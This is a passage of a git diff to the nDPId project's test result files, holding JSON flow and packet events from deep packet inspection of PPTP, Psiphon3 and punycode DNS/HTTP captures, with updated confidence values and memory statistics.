00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531183,"pkt":"0N+aZRdHAhoR+E9+CABFUAA8Q2pAAPwGUty\/ZT0BwKgrFga7oZZ1tjA4flC2haASD5Yd2AAAAgQFMgEBCAoLt6rxAAf8IQQCAAA="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1451895531183,"pkt":"AhoR+E9+0N+aZRdHCABFAAA0SqZAAEAGB\/nAqCsWv2U9AaGWBrt+ULaFdbYwOYAQchDmkwAAAQEICgAH\/CwLt6rx"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} -00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} +00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":740,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1451895536574} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872187 bytes -~~ total memory freed........: 5872187 bytes -~~ total allocations/frees...: 118139/118139 +~~ total memory allocated....: 6005821 bytes +~~ total memory freed........: 6005821 bytes +~~ total allocations/frees...: 120901/120901 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 678 chars diff --git a/test/results/psiphon3.pcap.out b/test/results/psiphon3.pcap.out new file mode 100644 index 000000000..dc476f61a --- /dev/null +++ b/test/results/psiphon3.pcap.out @@ -0,0 +1,26 @@ +00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"psiphon3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"psiphon3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1613865079123} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613865079123,"flow_last_seen":1613865079123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613865079123,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613865079123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1613865079123,"pkt":"RQAAPJ+KQABABtpRwKgAZ2gSl76ebQG7Qi4DFAAAAACgAv\/\/BPgAAAIEBbQEAggKAB2cngAAAAABAwMJ"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613865079129,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1613865079129,"pkt":"RQAAPJ+KQABABtpRwKgAZ2gSl76ebQG7Qi4DFAAAAACgAv\/\/BPgAAAIEBbQEAggKAB2cngAAAAABAwMJ"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1613865079140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1613865079140,"pkt":"RQAANAAAQAA8Bn3kaBKXvsCoAGcBu55t3jKOvkIuAxWAEv\/\/W\/0AAAIEBXgBAQQCAQMDCg=="} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1613865079123,"flow_last_seen":1613865079143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1613865079143,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"2d703033628575a99d44820c43b84876","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01025{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1613865079123,"flow_last_seen":1613865079168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1796,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1613865079168,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"2d703033628575a99d44820c43b84876","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01320{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1613865079123,"flow_last_seen":1613865079168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2758,"flow_avg_l4_payload_len":229,"midstream":0,"thread_ts_msec":1613865079168,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Psiphon","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"sni.cloudflaressl.com,psiphon3.net,*.psiphon3.net","ja3":"2d703033628575a99d44820c43b84876","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3","subjectDN":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com","alpn":"h2,http\/1.1","fingerprint":"49:30:DE:8F:B7:AF:C3:76:40:09:44:15:B4:6B:D9:8F:BE:0C:6B:0C"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":62,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1613865079123,"flow_last_seen":1613865079845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9274,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1613865079845,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Psiphon","breed":"Acceptable","category":"VPN"}} +00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":62,"source":"psiphon3.pcap","alias":"nDPId-test","packets-captured":62,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":9274,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1613865079845} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 62/62 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 9274 bytes +~~ total detected protocols..: 1 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6009544 bytes +~~ total memory freed........: 6009544 bytes +~~ total allocations/frees...: 120947/120947 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 456 chars +~~ json string max len.......: 1325 chars +~~ json string avg len.......: 863 chars diff --git a/test/results/punycode-idn.pcap.out b/test/results/punycode-idn.pcap.out index 5eda3a827..380f57880 100644 --- a/test/results/punycode-idn.pcap.out +++ b/test/results/punycode-idn.pcap.out @@ -2,22 +2,22 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643874953669} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643874953669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1643874953669,"pkt":"BBjWBrNamAGnpQyTCABFAAA3T1gAAEARpYDAqAKMwKgCAbHQADUAI+SVpXsBAAABAAAAAAAAAWkEc2NkbgJjbwAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953669,"flow_last_seen":1643874953669,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643874953669,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643874953689,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1643874953689,"pkt":"mAGnpQyTBBjWBrNaCABFAAByB3NAAEARrSrAqAIBwKgCjAA1sdAAXmq0pXuBgAABAAIAAAAAAWkEc2NkbgJjbwAAAQABwAwABQABAAAACwAfBnNjZG5jbwdzcG90aWZ5A21hcAZmYXN0bHkDbmV0AMAnAAEAAQAAAB4ABJJLPvg="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874953689,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"146.75.62.248"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874953689,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"},"dns": {"query":"i.scdn.co","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"146.75.62.248"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643874953695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1643874953695,"pkt":"BBjWBrNamAGnpQyTCABFAABDinIAAEARalrAqAKMwKgCAer8ADUAL4QJ+wUBAAABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643874953696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1643874953696,"pkt":"mAGnpQyTBBjWBrNaCABFAABDB3RAAEARrVjAqAIBwKgCjAA16vwALwOG+wWBgwABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 